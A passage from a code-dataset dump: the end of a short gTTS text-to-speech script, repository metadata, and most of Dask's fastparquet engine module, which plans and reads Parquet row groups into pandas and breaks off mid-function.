language='en'
sp=gTTS(text=input('ENTER YOUR TEXT: \n') ,lang=language, slow=False)
sp.save(audio)
playsound(audio)
| true | true |
f725f37fb53556a224003a62cbca39f0bc36a66e | 47,357 | py | Python | dask/dataframe/io/parquet/fastparquet.py | ParticularMiner/dask | f40ef97ac802efb6d8bef03b03c6357cf871bc0a | [
"BSD-3-Clause"
] | null | null | null | dask/dataframe/io/parquet/fastparquet.py | ParticularMiner/dask | f40ef97ac802efb6d8bef03b03c6357cf871bc0a | [
"BSD-3-Clause"
] | null | null | null | dask/dataframe/io/parquet/fastparquet.py | ParticularMiner/dask | f40ef97ac802efb6d8bef03b03c6357cf871bc0a | [
"BSD-3-Clause"
] | null | null | null | import copy
import pickle
import threading
import warnings
from collections import OrderedDict, defaultdict
from contextlib import ExitStack
import numpy as np
import pandas as pd
import tlz as toolz
from packaging.version import parse as parse_version
from dask.core import flatten
try:
import fastparquet
from fastparquet import ParquetFile
from fastparquet.util import ex_from_sep, get_file_scheme, groupby_types, val_to_num
from fastparquet.writer import make_part_file, partition_on_columns
except ImportError:
pass
from dask.base import tokenize
#########################
# Fastparquet interface #
#########################
from dask.dataframe.io.parquet.utils import (
Engine,
_get_aggregation_depth,
_normalize_index_columns,
_parse_pandas_metadata,
_process_open_file_options,
_row_groups_to_parts,
_set_gather_statistics,
_set_metadata_task_size,
_sort_and_analyze_paths,
_split_user_options,
)
from dask.dataframe.io.utils import _is_local_fs, _meta_from_dtypes, _open_input_files
from dask.dataframe.utils import UNKNOWN_CATEGORIES
from dask.delayed import Delayed
from dask.utils import natural_sort_key
# Module-level re-entrant lock. Per the original note it serializes
# resetting of row-groups on a shared ParquetFile; the acquiring code is
# not in this chunk (presumably the write path) — confirm before changing.
_FP_FILE_LOCK = threading.RLock()
def _paths_to_cats(paths, file_scheme):
    """
    Extract categorical fields and labels from hive- or drill-style paths.

    FixMe: This has been pasted from https://github.com/dask/fastparquet/pull/471
    Use fastparquet.api.paths_to_cats from fastparquet>0.3.2 instead.

    Parameters
    ----------
    paths (Iterable[str]): file paths relative to root
    file_scheme (str):

    Returns
    -------
    cats (OrderedDict[str, List[Any]]): a dict of field names and their values
    """
    # Flat layouts encode no partition information in their paths.
    if file_scheme in ["simple", "flat", "other"]:
        return {}

    cats = OrderedDict()
    raw_cats = OrderedDict()
    deduped_paths = toolz.unique(paths)
    if file_scheme == "hive":
        # hive scheme: "key=value" directory components.
        sep_regex = ex_from_sep("/")
        key_val_pairs = toolz.unique(
            (key, val)
            for path in deduped_paths
            for key, val in sep_regex.findall(path)
        )
    else:
        # drill scheme: unnamed directory levels become "dir0", "dir1", ...
        key_val_pairs = (
            ("dir%i" % level, val)
            for level, val in toolz.unique(
                (level, val)
                for path in deduped_paths
                for level, val in enumerate(path.split("/")[:-1])
            )
        )
    for key, raw_val in key_val_pairs:
        cats.setdefault(key, set()).add(val_to_num(raw_val))
        raw_cats.setdefault(key, set()).add(raw_val)

    for key, converted_vals in cats.items():
        # val_to_num must be injective on this key's raw labels; if two
        # distinct partition names collapse onto one converted value,
        # refuse to guess and raise.
        raw_vals = raw_cats[key]
        if len(converted_vals) != len(raw_vals):
            groups = OrderedDict()
            for raw_val in raw_vals:
                groups.setdefault(val_to_num(raw_val), set()).add(raw_val)
            conflicts = []
            for members in groups.values():
                if len(members) > 1:
                    conflicts.extend(members)
            raise ValueError("Partition names map to the same value: %s" % conflicts)
        # Warn when a key's converted values do not share a single type.
        vals_by_type = groupby_types(converted_vals)
        if len(vals_by_type) > 1:
            examples = [group[0] for group in vals_by_type.values()]
            warnings.warn(
                "Partition names coerce to values of different types, e.g. %s"
                % examples
            )

    return OrderedDict((key, list(vals)) for key, vals in cats.items())
# Module-level alias of the vendored implementation above; callers use
# this name so it can later be swapped for the upstream function.
paths_to_cats = (
    _paths_to_cats  # FixMe: use fastparquet.api.paths_to_cats for fastparquet>0.3.2
)
class FastParquetEngine(Engine):
    @classmethod
    def _organize_row_groups(
        cls,
        pf,
        split_row_groups,
        gather_statistics,
        stat_col_indices,
        filters,
        dtypes,
        base_path,
        has_metadata_file,
        chunksize,
        aggregation_depth,
    ):
        """Organize row-groups by file.

        Walks ``pf.row_groups`` once, grouping row-groups by the file they
        live in and (optionally) collecting min/max statistics for the
        columns listed in ``stat_col_indices``. ``gather_statistics`` may
        be demoted to False mid-loop when statistics are only wanted for
        divisions (no filters/chunksize/aggregation) and a column turns
        out to be unsorted or to lack statistics.

        Returns
        -------
        tuple
            ``(file_row_groups, file_row_group_stats,
            file_row_group_column_stats, gather_statistics, base_path)``
            where the first three are dicts keyed by file path.
        """
        # Get partitioning metadata
        pqpartitions = list(pf.cats)
        # Fastparquet does not use a natural sorting
        # order for partitioned data. Re-sort by path
        if (
            pqpartitions
            and aggregation_depth
            and pf.row_groups
            and pf.row_groups[0].columns[0].file_path
        ):
            pf.row_groups = sorted(
                pf.row_groups,
                key=lambda x: natural_sort_key(x.columns[0].file_path),
            )
        # Store types specified in pandas metadata
        pandas_type = {}
        if pf.row_groups and pf.pandas_metadata:
            for c in pf.pandas_metadata.get("columns", []):
                if "field_name" in c:
                    pandas_type[c["field_name"]] = c.get("pandas_type", None)
        # Get the number of row groups per file
        single_rg_parts = int(split_row_groups) == 1
        file_row_groups = defaultdict(list)
        file_row_group_stats = defaultdict(list)
        file_row_group_column_stats = defaultdict(list)
        # Tracks the previous row-group's max per column, to detect
        # unsorted data when computing divisions.
        cmax_last = {}
        for rg, row_group in enumerate(pf.row_groups):
            # We can filter partition columns here without dealing
            # with statistics
            if (
                pqpartitions
                and filters
                and fastparquet.api.filter_out_cats(row_group, filters)
            ):
                continue
            # NOTE: Here we assume that all column chunks are stored
            # in the same file. This is not strictly required by the
            # parquet spec.
            fp = row_group.columns[0].file_path
            fpath = fp.decode() if isinstance(fp, bytes) else fp
            if fpath is None:
                if not has_metadata_file:
                    # There doesn't need to be a file_path if the
                    # row group is in the same file as the metadata.
                    # Assume this is a single-file dataset.
                    fpath = pf.fn
                    base_path = base_path or ""
                else:
                    raise ValueError(
                        "Global metadata structure is missing a file_path string. "
                        "If the dataset includes a _metadata file, that file may "
                        "have one or more missing file_path fields."
                    )
            # Append a tuple to file_row_groups. This tuple will
            # be structured as: `(<local-row-group-id>, <global-row-group-id>)`
            if file_row_groups[fpath]:
                file_row_groups[fpath].append((file_row_groups[fpath][-1][0] + 1, rg))
            else:
                file_row_groups[fpath].append((0, rg))
            if gather_statistics:
                if single_rg_parts:
                    s = {
                        "file_path_0": fpath,
                        "num-rows": row_group.num_rows,
                        "total_byte_size": row_group.total_byte_size,
                        "columns": [],
                    }
                else:
                    s = {
                        "num-rows": row_group.num_rows,
                        "total_byte_size": row_group.total_byte_size,
                    }
                cstats = []
                for name, i in stat_col_indices.items():
                    column = row_group.columns[i]
                    if column.meta_data.statistics:
                        cmin = None
                        cmax = None
                        # TODO: Avoid use of `pf.statistics`
                        if pf.statistics["min"][name][0] is not None:
                            cmin = pf.statistics["min"][name][rg]
                            cmax = pf.statistics["max"][name][rg]
                        elif dtypes[name] == "object":
                            cmin = column.meta_data.statistics.min_value
                            cmax = column.meta_data.statistics.max_value
                            # Older versions may not have cmin/cmax_value
                            if cmin is None:
                                cmin = column.meta_data.statistics.min
                            if cmax is None:
                                cmax = column.meta_data.statistics.max
                        # Decode bytes as long as "bytes" is not the
                        # expected `pandas_type` for this column
                        if (
                            isinstance(cmin, (bytes, bytearray))
                            and pandas_type.get(name, None) != "bytes"
                        ):
                            cmin = cmin.decode("utf-8")
                            cmax = cmax.decode("utf-8")
                        if isinstance(cmin, np.datetime64):
                            tz = getattr(dtypes[name], "tz", None)
                            cmin = pd.Timestamp(cmin, tz=tz)
                            cmax = pd.Timestamp(cmax, tz=tz)
                        last = cmax_last.get(name, None)
                        if not (filters or chunksize or aggregation_depth):
                            # Only think about bailing if we don't need
                            # stats for filtering
                            if cmin is None or (last and cmin < last):
                                # We are collecting statistics for divisions
                                # only (no filters) - Column isn't sorted, or
                                # we have an all-null partition, so lets bail.
                                #
                                # Note: This assumes ascending order.
                                #
                                gather_statistics = False
                                file_row_group_stats = {}
                                file_row_group_column_stats = {}
                                break
                        if single_rg_parts:
                            s["columns"].append(
                                {
                                    "name": name,
                                    "min": cmin,
                                    "max": cmax,
                                }
                            )
                        else:
                            cstats += [cmin, cmax]
                        cmax_last[name] = cmax
                    else:
                        if (
                            not (filters or chunksize or aggregation_depth)
                            and column.meta_data.num_values > 0
                        ):
                            # We are collecting statistics for divisions
                            # only (no filters) - Lets bail.
                            gather_statistics = False
                            file_row_group_stats = {}
                            file_row_group_column_stats = {}
                            break
                        if single_rg_parts:
                            s["columns"].append({"name": name})
                        else:
                            cstats += [None, None, None]
                if gather_statistics:
                    file_row_group_stats[fpath].append(s)
                    if not single_rg_parts:
                        file_row_group_column_stats[fpath].append(tuple(cstats))
        return (
            file_row_groups,
            file_row_group_stats,
            file_row_group_column_stats,
            gather_statistics,
            base_path,
        )
@classmethod
def _get_thrift_row_groups(
cls,
pf,
filename,
row_groups,
):
"""Turn a set of row-groups into bytes-serialized form
using thrift via pickle.
"""
real_row_groups = []
for rg, rg_global in row_groups:
row_group = pf.row_groups[rg_global]
columns = row_group.columns
for c, col in enumerate(columns):
if c:
col.file_path = None
md = col.meta_data
md.key_value_metadata = None
# NOTE: Fastparquet may need the null count in the
# statistics, so we cannot just set statistics
# to none. Set attributes separately:
st = md.statistics
if st:
st.distinct_count = None
st.max = None
st.min = None
st.max_value = None
st.min_value = None
md.encodings = None
md.total_uncompressed_size = None
md.encoding_stats = None
row_group.columns = columns
real_row_groups.append(row_group)
return real_row_groups
@classmethod
def _make_part(
cls,
filename,
rg_list,
fs=None,
pf=None,
base_path=None,
partitions=None,
):
"""Generate a partition-specific element of `parts`."""
if partitions:
real_row_groups = cls._get_thrift_row_groups(
pf,
filename,
rg_list,
)
part = {"piece": (real_row_groups,)}
else:
# Get full path (empty strings should be ignored)
full_path = fs.sep.join([p for p in [base_path, filename] if p != ""])
row_groups = [rg[0] for rg in rg_list] # Don't need global IDs
part = {"piece": (full_path, row_groups)}
return part
    @classmethod
    def _collect_dataset_info(
        cls,
        paths,
        fs,
        categories,
        index,
        gather_statistics,
        filters,
        split_row_groups,
        chunksize,
        aggregate_files,
        ignore_metadata_file,
        metadata_task_size,
        parquet_file_extension,
        kwargs,
    ):
        """Collect dataset metadata and a ``ParquetFile`` handle for ``paths``.

        Resolves whether a global ``_metadata`` file is usable, filters
        data files by ``parquet_file_extension``, infers the hive/drill
        partitioning scheme, and validates the ``aggregate_files`` setting.
        Returns a ``dataset_info`` dict consumed by ``_create_dd_meta`` and
        ``_construct_collection_plan``. When statistics are not being
        gathered, ``parts`` is pre-populated with one path per part.
        """
        # Define the parquet-file (pf) object to use for metadata,
        # Also, initialize `parts`. If `parts` is populated here,
        # then each part will correspond to a file. Otherwise, each part will
        # correspond to a row group (populated later).
        # Extract "supported" key-word arguments from `kwargs`.
        # Split items into `dataset_kwargs` and `read_kwargs`
        dataset_kwargs, read_kwargs, user_kwargs = _split_user_options(**kwargs)
        parts = []
        _metadata_exists = False
        if len(paths) == 1 and fs.isdir(paths[0]):
            # This is a directory.
            # Check if _metadata and/or _common_metadata files exists
            base = paths[0]
            _metadata_exists = True
            if not ignore_metadata_file:
                _metadata_exists = fs.isfile(fs.sep.join([base, "_metadata"]))
            # Find all files if we are not using a _metadata file
            if ignore_metadata_file or not _metadata_exists:
                # For now, we need to discover every file under paths[0]
                paths, base, fns = _sort_and_analyze_paths(fs.find(base), fs)
                _update_paths = False
                for fn in ["_metadata", "_common_metadata"]:
                    try:
                        fns.remove(fn)
                        _update_paths = True
                    except ValueError:
                        pass
                if _update_paths:
                    paths = [fs.sep.join([base, fn]) for fn in fns]
                _metadata_exists = False
            if _metadata_exists:
                # Using _metadata file (best-case scenario)
                pf = ParquetFile(
                    fs.sep.join([base, "_metadata"]),
                    open_with=fs.open,
                    **dataset_kwargs,
                )
            else:
                # Use 0th file
                # Note that "_common_metadata" can cause issues for
                # partitioned datasets.
                if parquet_file_extension:
                    # Raise error if all files have been filtered by extension
                    len0 = len(paths)
                    paths = [
                        path for path in paths if path.endswith(parquet_file_extension)
                    ]
                    if len0 and paths == []:
                        raise ValueError(
                            "No files satisfy the `parquet_file_extension` criteria "
                            f"(files must end with {parquet_file_extension})."
                        )
                pf = ParquetFile(
                    paths[:1], open_with=fs.open, root=base, **dataset_kwargs
                )
                scheme = get_file_scheme(fns)
                pf.file_scheme = scheme
                pf.cats = paths_to_cats(fns, scheme)
                if not gather_statistics:
                    parts = [fs.sep.join([base, fn]) for fn in fns]
        else:
            # This is a list of files
            paths, base, fns = _sort_and_analyze_paths(paths, fs)
            # Check if _metadata is in paths, and
            # remove it if ignore_metadata_file=True
            _metadata_exists = "_metadata" in fns
            if _metadata_exists and ignore_metadata_file:
                fns.remove("_metadata")
                _metadata_exists = False
            paths = [fs.sep.join([base, fn]) for fn in fns]
            if _metadata_exists:
                # We have a _metadata file, lets use it
                pf = ParquetFile(
                    fs.sep.join([base, "_metadata"]),
                    open_with=fs.open,
                    **dataset_kwargs,
                )
            else:
                # Rely on metadata for 0th file.
                # Will need to pass a list of paths to read_partition
                scheme = get_file_scheme(fns)
                pf = ParquetFile(
                    paths[:1], open_with=fs.open, root=base, **dataset_kwargs
                )
                pf.file_scheme = scheme
                pf.cats = paths_to_cats(fns, scheme)
                if not gather_statistics:
                    parts = paths.copy()
        # Check the `aggregate_files` setting
        aggregation_depth = _get_aggregation_depth(
            aggregate_files,
            list(pf.cats),
        )
        # Ensure that there is no overlap between partition columns
        # and explicit columns in `pf`
        if pf.cats:
            _partitions = [p for p in pf.cats if p not in pf.columns]
            if not _partitions:
                pf.cats = {}
            elif len(_partitions) != len(pf.cats):
                raise ValueError(
                    "No partition-columns should be written in the \n"
                    "file unless they are ALL written in the file.\n"
                    "columns: {} | partitions: {}".format(pf.columns, pf.cats.keys())
                )
        return {
            "pf": pf,
            "paths": paths,
            "has_metadata_file": _metadata_exists,
            "parts": parts,
            "base": base,
            "fs": fs,
            "gather_statistics": gather_statistics,
            "categories": categories,
            "index": index,
            "filters": filters,
            "split_row_groups": split_row_groups,
            "chunksize": chunksize,
            "aggregate_files": aggregate_files,
            "aggregation_depth": aggregation_depth,
            "metadata_task_size": metadata_task_size,
            "kwargs": {
                "dataset": dataset_kwargs,
                "read": read_kwargs,
                **user_kwargs,
            },
        }
    @classmethod
    def _create_dd_meta(cls, dataset_info):
        """Construct the empty output DataFrame (``meta``) for the dataset.

        Reconciles pandas metadata (when present) with the user-specified
        index and categorical options, resolves dtypes (hive-partition
        columns become categoricals), and records the normalized results
        back into ``dataset_info`` for the later planning stages.
        """
        # Collect necessary information from dataset_info
        pf = dataset_info["pf"]
        index = dataset_info["index"]
        categories = dataset_info["categories"]
        columns = None
        pandas_md = pf.pandas_metadata
        if pandas_md:
            (
                index_names,
                column_names,
                storage_name_mapping,
                column_index_names,
            ) = _parse_pandas_metadata(pandas_md)
            #  auto-ranges should not be created by fastparquet
            column_names.extend(pf.cats)
        else:
            index_names = []
            column_names = pf.columns + list(pf.cats)
            storage_name_mapping = {k: k for k in column_names}
            column_index_names = [None]
        if index is None and len(index_names) > 0:
            # Use the index recorded in the pandas metadata.
            if len(index_names) == 1 and index_names[0] is not None:
                index = index_names[0]
            else:
                index = index_names
        # Normalize user inputs
        column_names, index_names = _normalize_index_columns(
            columns, column_names, index, index_names
        )
        all_columns = index_names + column_names
        categories_dict = None
        if isinstance(categories, dict):
            categories_dict = categories
        if categories is None:
            categories = pf.categories
        elif isinstance(categories, str):
            categories = [categories]
        else:
            categories = list(categories)
        # Check that categories are included in columns
        if categories and not set(categories).intersection(all_columns):
            raise ValueError(
                "categories not in available columns.\n"
                "categories: {} | columns: {}".format(categories, list(all_columns))
            )
        dtypes = pf._dtypes(categories)
        dtypes = {storage_name_mapping.get(k, k): v for k, v in dtypes.items()}
        index_cols = index or ()
        if isinstance(index_cols, str):
            index_cols = [index_cols]
        for ind in index_cols:
            if getattr(dtypes.get(ind), "numpy_dtype", None):
                # index does not support masked types
                dtypes[ind] = dtypes[ind].numpy_dtype
        # Requested categoricals get a placeholder category set for meta.
        for cat in categories:
            if cat in all_columns:
                dtypes[cat] = pd.CategoricalDtype(categories=[UNKNOWN_CATEGORIES])
        # Partition columns are categoricals with known categories.
        for catcol in pf.cats:
            if catcol in all_columns:
                dtypes[catcol] = pd.CategoricalDtype(categories=pf.cats[catcol])
        meta = _meta_from_dtypes(all_columns, dtypes, index_cols, column_index_names)
        # Update `dataset_info` and return `meta`
        dataset_info["dtypes"] = dtypes
        dataset_info["index"] = index
        dataset_info["index_cols"] = index_cols
        dataset_info["categories"] = categories
        dataset_info["categories_dict"] = categories_dict
        return meta
    @classmethod
    def _construct_collection_plan(cls, dataset_info):
        """Build the output-partition plan: ``(parts, stats, common_kwargs)``.

        Decides whether statistics must be gathered, short-circuits to a
        simple one-part-per-file plan when possible, and otherwise collects
        per-file row-group information — either serially on the client
        (when a global ``_metadata`` file exists or ``metadata_task_size``
        allows) or via a small Delayed graph over batches of files.
        """
        # Collect necessary information from dataset_info
        fs = dataset_info["fs"]
        parts = dataset_info["parts"]
        paths = dataset_info["paths"]
        filters = dataset_info["filters"]
        pf = dataset_info["pf"]
        split_row_groups = dataset_info["split_row_groups"]
        chunksize = dataset_info["chunksize"]
        gather_statistics = dataset_info["gather_statistics"]
        base_path = dataset_info["base"]
        aggregation_depth = dataset_info["aggregation_depth"]
        index_cols = dataset_info["index_cols"]
        categories = dataset_info["categories"]
        dtypes = dataset_info["dtypes"]
        categories_dict = dataset_info["categories_dict"]
        has_metadata_file = dataset_info["has_metadata_file"]
        metadata_task_size = dataset_info["metadata_task_size"]
        kwargs = dataset_info["kwargs"]
        # Ensure metadata_task_size is set
        # (Using config file or defaults)
        metadata_task_size = _set_metadata_task_size(
            dataset_info["metadata_task_size"], fs
        )
        # Determine which columns need statistics.
        # At this point, gather_statistics is only True if
        # the user specified calculate_divisions=True
        filter_columns = {t[0] for t in flatten(filters or [], container=list)}
        stat_col_indices = {}
        _index_cols = index_cols if (gather_statistics and len(index_cols) == 1) else []
        for i, name in enumerate(pf.columns):
            if name in _index_cols or name in filter_columns:
                stat_col_indices[name] = i
        # Decide final `gather_statistics` setting.
        # NOTE: The "fastparquet" engine requires statistics for
        # filtering even if the filter is on a partitioned column
        gather_statistics = _set_gather_statistics(
            gather_statistics,
            chunksize,
            split_row_groups,
            aggregation_depth,
            filter_columns,
            set(stat_col_indices) | filter_columns,
        )
        # Define common_kwargs
        common_kwargs = {
            "categories": categories_dict or categories,
            "root_cats": pf.cats,
            "root_file_scheme": pf.file_scheme,
            "base_path": base_path,
            **kwargs,
        }
        # Check if this is a very simple case where we can just
        # return the path names. This requires that `parts`
        # already be a list of paths. Also, we cannot be splitting
        # by row-group or collecting statistics.
        if (
            gather_statistics is False
            and not split_row_groups
            and isinstance(parts, list)
            and len(parts)
            and isinstance(parts[0], str)
        ):
            return (
                [{"piece": (full_path, None)} for full_path in parts],
                [],
                common_kwargs,
            )
        # Everything a (possibly remote) metadata-collection task needs.
        dataset_info_kwargs = {
            "fs": fs,
            "split_row_groups": split_row_groups,
            "gather_statistics": gather_statistics,
            "filters": filters,
            "dtypes": dtypes,
            "stat_col_indices": stat_col_indices,
            "aggregation_depth": aggregation_depth,
            "chunksize": chunksize,
            "root_cats": pf.cats,
            "root_file_scheme": pf.file_scheme,
            "base_path": "" if base_path is None else base_path,
            "has_metadata_file": has_metadata_file,
        }
        if (
            has_metadata_file
            or metadata_task_size == 0
            or metadata_task_size > len(paths)
        ):
            # Construct the output-partitioning plan on the
            # client process (in serial). This means we have
            # a global _metadata file, or that `metadata_task_size`
            # is zero or larger than the number of files.
            pf_or_paths = pf if has_metadata_file else paths
            parts, stats = cls._collect_file_parts(pf_or_paths, dataset_info_kwargs)
        else:
            # We DON'T have a global _metadata file to work with.
            # We should loop over files in parallel
            parts, stats = [], []
            if paths:
                # Build and compute a task graph to construct stats/parts
                gather_parts_dsk = {}
                name = "gather-pq-parts-" + tokenize(paths, dataset_info_kwargs)
                finalize_list = []
                for task_i, file_i in enumerate(
                    range(0, len(paths), metadata_task_size)
                ):
                    finalize_list.append((name, task_i))
                    gather_parts_dsk[finalize_list[-1]] = (
                        cls._collect_file_parts,
                        paths[file_i : file_i + metadata_task_size],
                        dataset_info_kwargs,
                    )

                # Reduction task: concatenate the per-batch results.
                def _combine_parts(parts_and_stats):
                    parts, stats = [], []
                    for part, stat in parts_and_stats:
                        parts += part
                        if stat:
                            stats += stat
                    return parts, stats

                gather_parts_dsk["final-" + name] = (_combine_parts, finalize_list)
                parts, stats = Delayed("final-" + name, gather_parts_dsk).compute()
        return parts, stats, common_kwargs
    @classmethod
    def _collect_file_parts(
        cls,
        pf_or_files,
        dataset_info_kwargs,
    ):
        """Construct parts/stats for a batch of files (or a ParquetFile).

        ``pf_or_files`` is either an already-open ``ParquetFile`` (the
        global-``_metadata`` path) or a list of file paths to open here.
        Runs ``_organize_row_groups`` and converts the result into output
        parts via ``_row_groups_to_parts``. May run on a worker, so all
        required state arrives through ``dataset_info_kwargs``.
        """
        # Collect necessary information from dataset_info
        fs = dataset_info_kwargs["fs"]
        split_row_groups = dataset_info_kwargs["split_row_groups"]
        gather_statistics = dataset_info_kwargs["gather_statistics"]
        stat_col_indices = dataset_info_kwargs["stat_col_indices"]
        filters = dataset_info_kwargs["filters"]
        dtypes = dataset_info_kwargs["dtypes"]
        chunksize = dataset_info_kwargs["chunksize"]
        aggregation_depth = dataset_info_kwargs["aggregation_depth"]
        base_path = dataset_info_kwargs.get("base_path", None)
        root_cats = dataset_info_kwargs.get("root_cats", None)
        root_file_scheme = dataset_info_kwargs.get("root_file_scheme", None)
        has_metadata_file = dataset_info_kwargs["has_metadata_file"]
        # Get ParquetFile
        if not isinstance(pf_or_files, fastparquet.api.ParquetFile):
            # Construct local `ParquetFile` object
            pf = ParquetFile(
                pf_or_files,
                open_with=fs.open,
                root=base_path,
            )
            # Update hive-partitioning to match global cats/scheme
            pf.cats = root_cats or {}
            if root_cats:
                pf.file_scheme = root_file_scheme
        else:
            # We already have a ParquetFile object to work with
            pf = pf_or_files
        # Organize row-groups by file
        (
            file_row_groups,
            file_row_group_stats,
            file_row_group_column_stats,
            gather_statistics,
            base_path,
        ) = cls._organize_row_groups(
            pf,
            split_row_groups,
            gather_statistics,
            stat_col_indices,
            filters,
            dtypes,
            base_path,
            has_metadata_file,
            chunksize,
            aggregation_depth,
        )
        # Convert organized row-groups to parts
        parts, stats = _row_groups_to_parts(
            gather_statistics,
            split_row_groups,
            aggregation_depth,
            file_row_groups,
            file_row_group_stats,
            file_row_group_column_stats,
            stat_col_indices,
            cls._make_part,
            make_part_kwargs={
                "fs": fs,
                "pf": pf,
                "base_path": base_path,
                "partitions": list(pf.cats),
            },
        )
        return parts, stats
    @classmethod
    def read_metadata(
        cls,
        fs,
        paths,
        categories=None,
        index=None,
        gather_statistics=None,
        filters=None,
        split_row_groups=False,
        chunksize=None,
        aggregate_files=None,
        ignore_metadata_file=False,
        metadata_task_size=None,
        parquet_file_extension=None,
        **kwargs,
    ):
        """Engine entry point: gather metadata and plan output partitions.

        Stage 1 collects dataset information, stage 2 builds the empty
        output DataFrame (``meta``), and stage 3 constructs the partition
        plan. ``common_kwargs`` (and, for file-level parts, a stripped
        ``ParquetFile``) are piggybacked on ``parts[0]`` so the engine API
        stays unchanged.

        Returns ``(meta, stats, parts, index)``.
        """
        # Stage 1: Collect general dataset information
        dataset_info = cls._collect_dataset_info(
            paths,
            fs,
            categories,
            index,
            gather_statistics,
            filters,
            split_row_groups,
            chunksize,
            aggregate_files,
            ignore_metadata_file,
            metadata_task_size,
            parquet_file_extension,
            kwargs,
        )
        # Stage 2: Generate output `meta`
        meta = cls._create_dd_meta(dataset_info)
        # Stage 3: Generate parts and stats
        parts, stats, common_kwargs = cls._construct_collection_plan(dataset_info)
        # Cannot allow `None` in columns if the user has specified index=False
        index = dataset_info["index"]
        if index is False and None in meta.columns:
            meta.drop(columns=[None], inplace=True)
        # Add `common_kwargs` to the first element of `parts`.
        # We can return as a separate element in the future, but
        # should avoid breaking the API for now.
        if len(parts):
            parts[0]["common_kwargs"] = common_kwargs
            parts[0]["aggregation_depth"] = dataset_info["aggregation_depth"]
        if len(parts) and len(parts[0]["piece"]) == 1:
            # Strip all partition-dependent or unnecessary
            # data from the `ParquetFile` object
            pf = dataset_info["pf"]
            pf.row_groups = None
            pf.fmd.row_groups = None
            pf._statistics = None
            parts[0]["common_kwargs"]["parquet_file"] = pf
        return (meta, stats, parts, index)
@classmethod
def multi_support(cls):
return cls == FastParquetEngine
    @classmethod
    def read_partition(
        cls,
        fs,
        pieces,
        columns,
        index,
        categories=(),
        root_cats=None,
        root_file_scheme=None,
        base_path=None,
        **kwargs,
    ):
        """Read one output partition (one or more "pieces") into pandas.

        Each piece is a tuple of either ``(path, row_group_ids)`` or
        ``(row_group_objects, ...)`` when a global ``parquet_file`` was
        shipped in ``kwargs`` by ``read_metadata``.
        """
        null_index_name = False
        base_path = False if not root_cats else base_path

        if isinstance(index, list):
            if index == [None]:
                # Handling a None-labeled index...
                # The pandas metadata told us to read in an index
                # labeled `None`. If this corresponds to a `RangeIndex`,
                # fastparquet will need use the pandas metadata to
                # construct the index. Otherwise, the index will correspond
                # to a column named "__index_level_0__". We will need to
                # check the `ParquetFile` object for this column below.
                index = []
                null_index_name = True
            columns += index

        # Use global `parquet_file` object. Need to reattach
        # the desired row_group
        parquet_file = kwargs.pop("parquet_file", None)

        # Always convert pieces to list
        if not isinstance(pieces, list):
            pieces = [pieces]

        sample = pieces[0]
        if isinstance(sample, tuple):
            if isinstance(sample[0], str):
                # We have paths to read from
                assert parquet_file is None

                row_groups = []
                rg_offset = 0
                parquet_file = ParquetFile(
                    [p[0] for p in pieces],
                    open_with=fs.open,
                    root=base_path or False,
                    **kwargs.get("dataset", {}),
                )
                for piece in pieces:
                    # Map each piece's local row-group ids onto the global
                    # ids of the combined `parquet_file` built above
                    _pf = (
                        parquet_file
                        if len(pieces) == 1
                        else ParquetFile(
                            piece[0],
                            open_with=fs.open,
                            root=base_path or False,
                            **kwargs.get("dataset", {}),
                        )
                    )
                    n_local_row_groups = len(_pf.row_groups)
                    local_rg_indices = piece[1] or list(range(n_local_row_groups))
                    row_groups += [
                        parquet_file.row_groups[rg + rg_offset]
                        for rg in local_rg_indices
                    ]
                    rg_offset += n_local_row_groups
                update_parquet_file = len(row_groups) < len(parquet_file.row_groups)

            elif parquet_file:
                row_groups = []
                for piece in pieces:
                    # `piece[1]` will contain actual row-group objects,
                    # but they may be pickled
                    rgs = piece[0]
                    if isinstance(rgs, bytes):
                        rgs = pickle.loads(rgs)
                    row_groups += rgs
                update_parquet_file = True

            else:
                raise ValueError("Neither path nor ParquetFile detected!")

            if update_parquet_file:
                # Mutating the shared ParquetFile; serialize under the lock
                with _FP_FILE_LOCK:
                    for rg in row_groups:
                        for chunk in rg.columns:
                            s = chunk.file_path
                            if s and isinstance(s, bytes):
                                chunk.file_path = s.decode()
                    parquet_file.fmd.row_groups = row_groups

                    # NOTE: May lose cats after `_set_attrs` call
                    save_cats = parquet_file.cats
                    parquet_file._set_attrs()
                    parquet_file.cats = save_cats

            if null_index_name:
                if "__index_level_0__" in parquet_file.columns:
                    # See "Handling a None-labeled index" comment above
                    index = ["__index_level_0__"]
                    columns += index

            # Update hive-partitioning information if necessary
            parquet_file.cats = root_cats or {}
            if root_cats:
                parquet_file.file_scheme = root_file_scheme

            parquet_file._dtypes = (
                lambda *args: parquet_file.dtypes
            )  # ugly patch, could be fixed

            # Convert ParquetFile to pandas
            return cls.pf_to_pandas(
                parquet_file,
                fs=fs,
                columns=columns,
                categories=categories,
                index=index,
                **kwargs.get("read", {}),
            )

        else:
            # `sample` is NOT a tuple
            raise ValueError(f"Expected tuple, got {type(sample)}")
    @classmethod
    def pf_to_pandas(
        cls,
        pf,
        fs=None,
        columns=None,
        categories=None,
        index=None,
        open_file_options=None,
        **kwargs,
    ):
        """Materialize a ``ParquetFile`` as a pandas DataFrame.

        Pre-allocates the output frame and fills it row-group by
        row-group, grouping row-groups per file so each file is opened
        once.
        """
        # This method was mostly copied from the fastparquet
        # `ParquetFile.to_pandas` definition. We maintain our
        # own implementation in Dask to enable better remote
        # file-handling control

        # Handle selected columns
        if columns is not None:
            columns = columns[:]
        else:
            columns = pf.columns + list(pf.cats)
        if index:
            columns += [i for i in index if i not in columns]

        # Extract row-groups and pre-allocate df
        rgs = pf.row_groups
        size = sum(rg.num_rows for rg in rgs)
        df, views = pf.pre_allocate(size, columns, categories, index)
        start = 0

        # Get a map of file names -> row-groups
        fn_rg_map = defaultdict(list)
        for rg in rgs:
            fn = pf.row_group_filename(rg)
            fn_rg_map[fn].append(rg)

        # Define file-opening options
        precache_options, open_file_options = _process_open_file_options(
            open_file_options,
            **(
                {
                    "allow_precache": False,
                    "default_cache": "readahead",
                }
                if _is_local_fs(fs)
                else {
                    "metadata": pf,
                    "columns": list(set(columns).intersection(pf.columns)),
                    "row_groups": [rgs for rgs in fn_rg_map.values()],
                    "default_engine": "fastparquet",
                    "default_cache": "readahead",
                }
            ),
        )

        with ExitStack() as stack:
            for fn, infile in zip(
                fn_rg_map.keys(),
                _open_input_files(
                    list(fn_rg_map.keys()),
                    fs=fs,
                    context_stack=stack,
                    precache_options=precache_options,
                    **open_file_options,
                ),
            ):
                for rg in fn_rg_map[fn]:
                    thislen = rg.num_rows
                    # Slice views so this row-group writes into its own
                    # [start, start + thislen) window of the output frame
                    parts = {
                        name: (
